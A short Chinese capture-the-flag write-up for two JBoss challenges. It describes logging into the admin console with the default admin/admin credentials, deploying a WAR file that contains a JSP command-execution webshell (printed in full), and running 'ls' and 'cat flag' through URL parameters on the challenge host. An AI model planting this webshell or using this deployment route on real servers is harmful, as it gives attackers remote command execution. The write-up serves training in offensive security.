两个JBoss题目几乎一模一样,解法也相同,题目只考一个内容,就是Jboss后台上传war包getshell。
首先是一个jboss页面。
后面的wiki等等连接都在jboss的官网,与本题没有关系。
第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。(这里的shell.war是已经上传好的)
在这里使用的是TsengYUen师傅的回显jsp一句话,然后使用命令打包。
jar cvf shell.war 1.jsp
一句话的内容为:
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
部署成功后查看自己的war包:
路径为/shell/1.asp
网页连接列目录
http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=ls
直接cat flag即可。
http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=cat%20flag0x03 asuka
JBoss系列的题目,与上一个JBoss相同的解法,用同一个war包即可。命令执行获取flag
